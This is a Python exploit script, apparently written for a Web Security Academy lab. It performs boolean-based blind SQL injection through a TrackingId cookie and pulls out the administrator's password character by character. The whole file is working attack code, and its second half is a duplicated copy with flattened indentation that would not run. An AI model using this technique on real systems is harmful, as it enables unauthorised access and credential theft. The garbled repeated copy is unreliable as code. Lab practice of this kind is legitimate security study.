luizmlo/exploit.py

## exploit.py
import requests, string

def test_query(query=''):
    url = 'https://aca51f221ea83843c0901b2000f9001f.web-security-academy.net/'
    base_value = 'buBwSd5frbC0rTFR'
    payload = base_value + query
    vuln_cookies = {'TrackingId':payload}
    r = requests.get(url, cookies=vuln_cookies).text
    return True if len(r.split('Welcome')) > 1 else False

charset = string.ascii_lowercase + string.digits
password = ''

for position in range(1,32):
    for char in charset:
        if test_query(f"%27+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username+=+%27administrator%27),{position},1)+=+%27{char}"):
            password += char
            print(f'password[{position-1}] = {char} -> {password}')
            break
	import requests, string

	def test_query(query=''):
	url = 'https://aca51f221ea83843c0901b2000f9001f.web-security-academy.net/'
	base_value = 'buBwSd5frbC0rTFR'
	payload = base_value + query
	vuln_cookies = {'TrackingId':payload}
	r = requests.get(url, cookies=vuln_cookies).text
	return True if len(r.split('Welcome')) > 1 else False

	charset = string.ascii_lowercase + string.digits
	password = ''

	for position in range(1,32):
	for char in charset:
	if test_query(f"%27+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username+=+%27administrator%27),{position},1)+=+%27{char}"):
	password += char
	print(f'password[{position-1}] = {char} -> {password}')
	break